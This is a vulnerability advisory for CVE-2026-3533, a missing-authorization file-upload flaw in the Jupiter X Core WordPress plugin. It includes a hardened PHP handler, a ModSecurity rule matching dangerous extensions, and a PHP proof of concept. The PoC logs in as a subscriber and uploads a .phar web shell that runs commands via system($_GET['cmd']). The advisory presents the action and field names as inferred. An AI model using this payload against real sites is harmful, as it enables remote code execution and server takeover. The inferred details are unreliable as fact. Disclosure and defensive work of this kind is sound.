Atomic Edge analysis of CVE-2026-3533 (metadata-based):
The Jupiter X Core plugin for WordPress, versions up to and including 4.14.1, contains a critical vulnerability that allows authenticated users with Subscriber-level access or higher to upload dangerous file types. This flaw resides in the `import_popup_templates()` function, which lacks proper authorization, and the `upload_files()` function, which performs insufficient file type validation.
Atomic Edge research identifies the root cause as a combination of two security failures. The first is a missing capability check on the `import_popup_templates()` function, allowing users with minimal privileges to invoke a file upload handler. The second is a failure to properly validate file extensions and MIME types within the `upload_files()` function. These conclusions are inferred from the CWE-434 classification and the vulnerability description, as the source code is not available for direct review.
An attacker exploits this vulnerability by sending an authenticated POST request to the WordPress AJAX endpoint `/wp-admin/admin-ajax.php`. The request must specify an action parameter that triggers the vulnerable `import_popup_templates()` function. A likely action value is `jupiterx_core_import_popup_templates` or a similar pattern derived from the plugin slug. The request includes a file upload parameter containing a malicious payload with a dangerous extension like `.phar`, `.svg`, `.dfxp`, or `.xhtml`. The server processes this upload without verifying the user’s right to do so or the safety of the file type.
Remediation requires two distinct code changes. Developers must implement a proper capability check, such as `current_user_can('edit_posts')` or a higher privilege, within the `import_popup_templates()` function to ensure only authorized users can access it. The `upload_files()` function must be patched to implement a strict allowlist of permitted file extensions and to perform server-side MIME type verification, rejecting any file not explicitly allowed.
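The two fixes described above, written out as an added example of a hardened WordPress AJAX import handler; this is not the Jupiter X Core plugin's code, and the hook name, function names, nonce action and the `file` field name are assumed. It assumes templates are imported as JSON files, so the content check is a JSON parse rather than a libmagic verdict, whose reporting for JSON varies between hosts.

```php
<?php
// Added example, not the plugin's own code: a hardened AJAX import handler
// showing both fixes the advisory calls for. The hook name, function names,
// nonce action and the 'file' field name are assumptions.
add_action('wp_ajax_example_import_popup_templates', 'example_import_popup_templates');
// Deliberately no wp_ajax_nopriv_ hook: logged-out callers never reach the handler.

function example_import_popup_templates() {
    // Fix 1: capability check. A Subscriber lacks edit_posts, so the
    // upload code below is unreachable for that role.
    if (!current_user_can('edit_posts')) {
        wp_send_json_error('Insufficient permissions', 403);
    }
    // Bind the request to a nonce so it cannot be forged from another site.
    check_ajax_referer('example_import_popup_templates', 'nonce');

    if (empty($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK) {
        wp_send_json_error('No file uploaded', 400);
    }
    $template = example_validate_template_upload($_FILES['file']);
    if (is_wp_error($template)) {
        wp_send_json_error($template->get_error_message(), 400);
    }
    // $template is the decoded JSON template at this point; import it here.
    wp_send_json_success('Template imported');
}

// Fix 2: allowlist the extension, verify the type server-side, and confirm
// the bytes really are a JSON template. Returns decoded data or a WP_Error.
function example_validate_template_upload(array $file) {
    $allowed = array('json' => 'application/json');
    // Extension allowlist: ext/type come back false for any name not in $allowed,
    // which rejects .phar, .svg, .dfxp and .xhtml before the file is touched.
    $check = wp_check_filetype($file['name'], $allowed);
    if (empty($check['ext'])) {
        return new WP_Error('bad_ext', 'Only .json template files are accepted');
    }
    // Never trust $file['type'] (client-supplied); sniff the stored bytes instead.
    // PHP source reports as text/x-php, SVG as image/svg+xml, so both are refused.
    $real = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($real, array('application/json', 'text/plain'), true)) {
        return new WP_Error('bad_mime', 'Unexpected content type: ' . $real);
    }
    // Content check: a script payload renamed to .json fails to parse as an object.
    $data = json_decode((string) file_get_contents($file['tmp_name']), true);
    if (!is_array($data) || json_last_error() !== JSON_ERROR_NONE) {
        return new WP_Error('bad_content', 'File is not a valid JSON template');
    }
    return $data;
}
```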
Successful exploitation leads to severe consequences. Attackers can achieve remote code execution on servers configured to execute `.phar` files as PHP code. Uploading `.svg`, `.dfxp`, or `.xhtml` files results in stored cross-site scripting attacks, as these file types can contain malicious scripts executed in a victim’s browser. This vulnerability grants low-privilege attackers a direct path to compromise the server or hijack user sessions.
Here you will find our ModSecurity-compatible rule to protect against this particular CVE.
```apache
# Atomic Edge WAF Rule - CVE-2026-3533 (metadata-based)
# REQUEST_FILENAME excludes the query string, so "admin-ajax.php?x=1" variants still match.
SecRule REQUEST_FILENAME "@streq /wp-admin/admin-ajax.php" \
    "id:63533,phase:2,deny,status:403,chain,msg:'CVE-2026-3533 via JupiterX Core AJAX file upload',severity:'CRITICAL',tag:'CVE-2026-3533',tag:'WordPress',tag:'plugin=jupiterx-core'"
    SecRule ARGS_POST:action "@streq jupiterx_core_import_popup_templates" "chain"
        # t:lowercase runs before the match, so .PHAR and other case variants are caught too.
        SecRule FILES "@rx \.(phar|svg|dfxp|xhtml)$" "t:lowercase,t:urlDecodeUni"
```
```php
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-3533 - JupiterX Core <= 4.14.1 - Authenticated (Subscriber+) Missing Authorization To Limited File Upload via Popup Template Import
$target_url = 'http://target-site.com/wp-admin/admin-ajax.php';
$login_url  = 'http://target-site.com/wp-login.php'; // standard WordPress login form handler
$username = 'subscriber_user';
$password = 'subscriber_pass';
// Step 1: Authenticate to WordPress to obtain cookies and a nonce.
// This PoC assumes the vulnerable endpoint does not require a nonce (missing authorization).
// If a nonce were required, it would typically be fetched from a page like the dashboard.
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => '1'
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $login_data);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
// Step 2: Construct the malicious file upload request.
// The exact action parameter is inferred from the plugin slug and function name.
$action = 'jupiterx_core_import_popup_templates';
// Create a temporary .phar file for RCE demonstration.
// The dollar sign is escaped so the payload's $_GET is written literally, not interpolated.
$phar_payload = "<?php echo 'Atomic Edge RCE Test'; system(\$_GET['cmd']); ?>\n";
$temp_file = tempnam(sys_get_temp_dir(), 'exp');
$phar_file = $temp_file . '.phar';
rename($temp_file, $phar_file);
file_put_contents($phar_file, $phar_payload);
// Prepare the multipart form data for file upload.
$post_fields = array(
    'action' => $action,
    // The file parameter name is assumed; common names include 'file', 'import_file', or 'template_file'.
    'file' => new CURLFile($phar_file, 'application/octet-stream', 'exploit.phar')
);
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
$upload_response = curl_exec($ch);
// Step 3: Check the response and attempt to access the uploaded file.
// The upload path is unknown; a successful upload might return a JSON response with a URL.
if (curl_getinfo($ch, CURLINFO_HTTP_CODE) == 200) {
    echo "Upload request completed.\n";
    echo "Response: " . substr($upload_response, 0, 500) . "\n";
    // An attacker would parse the response to find the uploaded file's location.
    // For this PoC, we assume a default WordPress uploads directory pattern.
    // This step is highly speculative without the actual plugin response format.
    echo "If successful, the .phar file may be accessible at a path like /wp-content/uploads/{date}/exploit.phar\n";
} else {
    echo "Upload request failed with HTTP code: " . curl_getinfo($ch, CURLINFO_HTTP_CODE) . "\n";
}
curl_close($ch);
unlink($phar_file);
?>
```